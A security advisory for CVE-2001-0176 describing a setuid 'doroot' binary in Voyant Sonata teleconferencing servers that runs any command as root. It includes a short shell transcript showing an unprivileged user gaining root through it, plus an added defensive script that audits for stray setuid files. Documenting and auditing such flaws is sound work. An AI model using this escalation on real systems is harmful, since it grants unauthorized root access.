Voyant Sonata doroot command vulnerability

2018.09.25
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: Voyant Sonata doroot command vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2000-11-30
CVE-ID: [CVE-2001-0176]
Download Site: http://www.voyanttechnology.com/
Vendor: Voyant Technologies.
Vendor Notified: 2000-11-30
Vendor Contact: vulnhelp@securityfocus.com
Advisory: http://www.vapid.dhs.org/advisories/voyant_technologies_sonata_vulnerabilities.html

Description:
Sonata is a teleconferencing solution developed by Voyant Technologies. This advisory concerns the Sonata application server and bridge component of the Sonata package. The application server is an Ultra Sparc 5 running Solaris 2.x as required by Voyant Technologies. The bridge is an IBM PC running OS/2 Warp. These hosts are usually built in house by Voyant personnel and installed at customer locations by a field engineer.

Vulnerability:
The setuid binary doroot does exactly what it says. It executes its command line argument as root. This is really silly and I don't know why it would need to exist.

Exploit Code:
$ cd /opt/TK/tk4.1/library/demos
$ id
uid=60001(nobody) gid=60001(nobody)
$ ./doroot id
uid=60001(nobody) gid=60001(nobody) euid=0(root)
$ ls -l doroot
rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot
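
An audit check for the condition shown above (a setuid file that any local user can execute, sitting in a directory where no setuid program belongs), added here as an example and not part of the original advisory. The function name audit_setuid and the EXPECTED_DIRS list are assumptions for illustration; adjust the list to the host being audited.

```shell
#!/bin/sh
# Added example (not from the advisory): report setuid files that every local
# user can execute, and flag the ones outside the usual system directories.

# Directories where setuid programs are normally expected.
# Assumption for this example; tune per host.
EXPECTED_DIRS="/usr/bin /usr/sbin /bin /sbin /usr/lib /usr/libexec"

# audit_setuid ROOT [OWNER_UID]
#   ROOT       directory tree to scan (stays on one filesystem)
#   OWNER_UID  numeric owner to match, default 0 (root)
# Prints one line per finding: "<UNEXPECTED|expected> <mode> <path>"
audit_setuid() {
    root=$1
    owner=${2:-0}
    # -perm -4001 matches files with BOTH the setuid bit and the
    # world-execute bit set, the combination seen in "rwsr-xr-x".
    find "$root" -xdev -type f -user "$owner" -perm -4001 2>/dev/null |
    while IFS= read -r path; do
        status=UNEXPECTED
        for d in $EXPECTED_DIRS; do
            case $path in
                "$d"/*) status=expected ;;
            esac
        done
        mode=$(ls -ld "$path" | awk '{print $1}')
        printf '%s %s %s\n' "$status" "$mode" "$path"
    done
}

# Usage: audit_setuid /opt
```

Lines marked UNEXPECTED are candidates for review; where the setuid bit has no justification, clearing it with chmod u-s removes the privilege.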

References:

http://www.vapidlabs.com/advisory.php?v=43

